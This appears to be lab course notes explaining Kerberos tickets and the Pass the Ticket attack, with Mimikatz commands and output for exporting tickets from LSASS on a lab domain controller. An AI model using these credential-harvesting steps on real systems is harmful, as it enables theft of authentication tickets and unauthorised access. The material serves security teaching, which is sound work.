
## Kerberos protocol

- The Kerberos authentication system is ticket-based. The central idea behind Kerberos is not to give an account password to every service you use. Instead, Kerberos keeps all tickets on your local system and presents each service only the specific ticket for that service, preventing a ticket from being used for another purpose.
- The `Ticket Granting Ticket` (`TGT`) is the first ticket obtained on a Kerberos system. The TGT permits the client to obtain additional Kerberos tickets or `TGS`.
- The `Ticket Granting Service` (`TGS`) is requested by users who want to use a service. These tickets allow services to verify the user's identity.

> When a user requests a `TGT`, they must authenticate to the domain controller by encrypting the current timestamp with their password hash. Once the domain controller validates the user's identity (because the domain knows the user's password hash, meaning it can decrypt the timestamp), it sends the user a TGT for future requests. Once the user has their ticket, they do not have to prove who they are with their password.

- If the user wants to connect to an MSSQL database, it will request a `Ticket Granting Service` (`TGS`) to the `Key Distribution Center` (`KDC`), presenting its `Ticket Granting Ticket` (`TGT`). Then it will give the TGS to the MSSQL database server for authentication.

## Pass the Ticket (PtT) attack
- We need a valid Kerberos ticket to perform a `Pass the Ticket (PtT)` attack. It can be:

- Service Ticket (TGS) to allow access to a particular resource.
- Ticket Granting Ticket (TGT), which we use to request service tickets to access any resource the user has privileges.

## Harvesting Kerberos tickets from Windows

- On Windows, tickets are processed and stored by the LSASS (Local Security Authority Subsystem Service) process. Therefore, to get a ticket from a Windows system, you must communicate with LSASS and request it. As a non-administrative user, you can only get your tickets, but as a local administrator, you can collect everything.
- We can harvest all tickets from a system using the `Mimikatz` module `sekurlsa::tickets /export`. The result is a list of files with the extension `.kirbi`, which contain the tickets.

```cmd-session
c:\tools> mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug  6 2020 14:53:43
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::tickets /export

Authentication Id : 0 ; 329278 (00000000:0005063e)
Session           : Network from 0
User Name         : DC01$
Domain            : HTB
Logon Server      : (null)
Logon Time        : 7/12/2022 9:39:55 AM
SID               : S-1-5-18
```

```cmd-session
c:\tools> dir *.kirbi

Directory: c:\tools

Mode                LastWriteTime         Length Name
----                -------------         ------ ----

<SNIP>

-a----        7/12/2022   9:44 AM           1445 [0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi
-a----        7/12/2022   9:44 AM           1565 [0;3e7]-0-2-40a50000-DC01$@cifs-DC01.inlanefreight.htb.kirbi
```

